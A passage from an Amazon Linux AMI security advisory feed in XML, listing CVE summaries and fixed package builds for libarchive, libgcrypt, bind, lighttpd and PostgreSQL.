Undefined behavior (signed integer overflow) was discovered in libarchive, in the MTREE parser&#039;s calculation of maximum and minimum dates. A crafted mtree file could potentially cause denial of service.
1348779:
CVE-2015-8931 libarchive: Undefined behavior (signed integer overflow) in mtree parser
CVE-2015-8930:
A vulnerability was found in libarchive. A specially crafted ISO file could cause the application to consume resources until it hit a memory limit, leading to a crash or denial of service.
1349204:
CVE-2015-8930 libarchive: Endless loop in ISO parser
CVE-2015-8928:
A vulnerability was found in libarchive. A specially crafted MTREE file could cause a limited out-of-bounds read, potentially disclosing contents of application memory.
1348429:
CVE-2015-8928 libarchive: Heap out of bounds read in mtree parser
CVE-2015-8926:
A vulnerability was found in libarchive. A specially crafted RAR file could cause the application to disclose a 128k block of memory from an uncontrolled location.
1348424:
CVE-2015-8926 libarchive: NULL pointer access in RAR parser
CVE-2015-8925:
A vulnerability was found in libarchive. A specially crafted MTREE file could cause a small out-of-bounds read, potentially disclosing a small amount of application memory.
1348423:
CVE-2015-8925 libarchive: Unclear invalid memory read in mtree parser
CVE-2015-8924:
A vulnerability was found in libarchive. A specially crafted TAR file could trigger an out-of-bounds read, potentially causing the application to disclose a small amount of application memory.
1348421:
CVE-2015-8924 libarchive: Heap out of bounds read in TAR parser
CVE-2015-8923:
A vulnerability was found in libarchive. A specially crafted ZIP file could cause a few bytes of application memory in a 256-byte region to be disclosed.
1348773:
CVE-2015-8923 libarchive: Unclear crashes in ZIP parser
CVE-2015-8922:
A vulnerability was found in libarchive. A specially crafted 7Z file could trigger a NULL pointer dereference, causing the application to crash.
1348419:
CVE-2015-8922 libarchive: NULL pointer access in 7z parser
CVE-2015-8921:
A vulnerability was found in libarchive. A specially crafted mtree file could cause libarchive to read beyond a statically declared structure, potentially disclosing application memory.
1348772:
CVE-2015-8921 libarchive: Global out of bounds read in mtree parser
CVE-2015-8920:
A vulnerability was found in libarchive. A specially crafted AR archive could cause the application to read a single byte of application memory, potentially disclosing it to the attacker.
1348416:
CVE-2015-8920 libarchive: Stack out of bounds read in ar parser
CVE-2015-8919:
A vulnerability was found in libarchive. A specially crafted LZA/LZH file could cause a small out-of-bounds read, potentially disclosing a few bytes of application memory.
1348414:
CVE-2015-8919 libarchive: Heap out of bounds read in LHA/LZH parser
CVE-2015-8917:
A vulnerability was found in libarchive. A specially crafted CAB file could cause the application dereference a NULL pointer, leading to a crash.
1348413:
CVE-2015-8917 libarchive: NULL pointer access in CAB parser
CVE-2015-8916:
A vulnerability was found in libarchive. A specially crafted RAR file could cause the application dereference a NULL pointer, leading to a crash.
1348412:
CVE-2015-8916 libarchive: NULL pointer access in RAR parser through bsdtar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8916" title="" id="CVE-2015-8916" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8917" title="" id="CVE-2015-8917" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8919" title="" id="CVE-2015-8919" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8920" title="" id="CVE-2015-8920" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8921" title="" id="CVE-2015-8921" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8922" title="" id="CVE-2015-8922" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8923" title="" id="CVE-2015-8923" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8924" title="" id="CVE-2015-8924" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8925" title="" id="CVE-2015-8925" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8926" title="" id="CVE-2015-8926" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8928" title="" id="CVE-2015-8928" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8930" title="" id="CVE-2015-8930" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8931" title="" id="CVE-2015-8931" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8932" title="" id="CVE-2015-8932" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8934" title="" id="CVE-2015-8934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1541" title="" id="CVE-2016-1541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4300" title="" id="CVE-2016-4300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4302" title="" id="CVE-2016-4302" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4809" title="" id="CVE-2016-4809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5418" title="" id="CVE-2016-5418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5844" title="" id="CVE-2016-5844" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6250" title="" id="CVE-2016-6250" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7166" title="" id="CVE-2016-7166" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bsdtar" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdtar-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-devel-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="libarchive" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdcpio-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-debuginfo-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-devel-3.1.2-10.11.amzn1.i686.rpm</filename></package><package name="bsdtar" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/bsdtar-3.1.2-10.11.amzn1.i686.rpm</filename></package><package name="libarchive" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-3.1.2-10.11.amzn1.i686.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/bsdcpio-3.1.2-10.11.amzn1.i686.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-debuginfo-3.1.2-10.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-744</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-744: medium priority package update for libgcrypt gnupg</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6313:
1366105:
CVE-2016-6313 libgcrypt: PRNG output is predictable
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6313" title="" id="CVE-2016-6313" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libgcrypt-devel" version="1.5.3" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-devel-1.5.3-12.19.amzn1.x86_64.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-1.5.3-12.19.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.19.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-devel" version="1.5.3" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-devel-1.5.3-12.19.amzn1.i686.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-1.5.3-12.19.amzn1.i686.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.19.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.19" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.19-1.28.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.19" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.19-1.28.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.19" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.19-1.28.amzn1.i686.rpm</filename></package><package name="gnupg" version="1.4.19" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.19-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-745</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-745: medium priority package update for bind</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2775:
It was found that the lightweight resolver could crash due to an error when asked to resolve a query name which, when combined with a search list entry, exceeds the maximum allowable length. A remote attacker could use this flaw to crash lwresd or named when using the &quot;lwres&quot; statement in named.conf.
1357803:
CVE-2016-2775 bind: Too long query name causes segmentation fault in lwresd
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2775" title="" id="CVE-2016-2775" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-libs" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-746</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-746: important priority package update for lighttpd</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1000212:
It was discovered that lighttpd class did not properly protect against the HTTP_PROXY variable name clash in a CGI context. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000212" title="" id="CVE-2016-1000212" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-mod_mysql_vhost" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.41-1.34.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.41-1.34.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.41-1.34.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.41-1.34.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.41-1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-747</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-747: medium priority package update for postgresql92 postgresql93 postgresql94</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5424:
A flaw was found in the way PostgreSQL client programs handled database and role names containing newlines, carriage returns, double quotes, or backslashes. By crafting such an object name, roles with the CREATEDB or CREATEROLE option could escalate their privileges to superuser when a superuser next executes maintenance with a vulnerable client program.
1364002:
CVE-2016-5424 postgresql: privilege escalation via crafted database and role names
CVE-2016-5423:
A flaw was found in the way PostgreSQL server handled certain SQL statements containing CASE/WHEN commands. A remote, authenticated attacker could use a specially crafted SQL statement to cause PostgreSQL to crash or disclose a few bytes of server memory or possibly execute arbitrary code.
1364001:
CVE-2016-5423 postgresql: CASE/WHEN with inlining can cause untrusted pointer dereference
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5423" title="" id="CVE-2016-5423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5424" title="" id="CVE-2016-5424" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-libs" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.18" 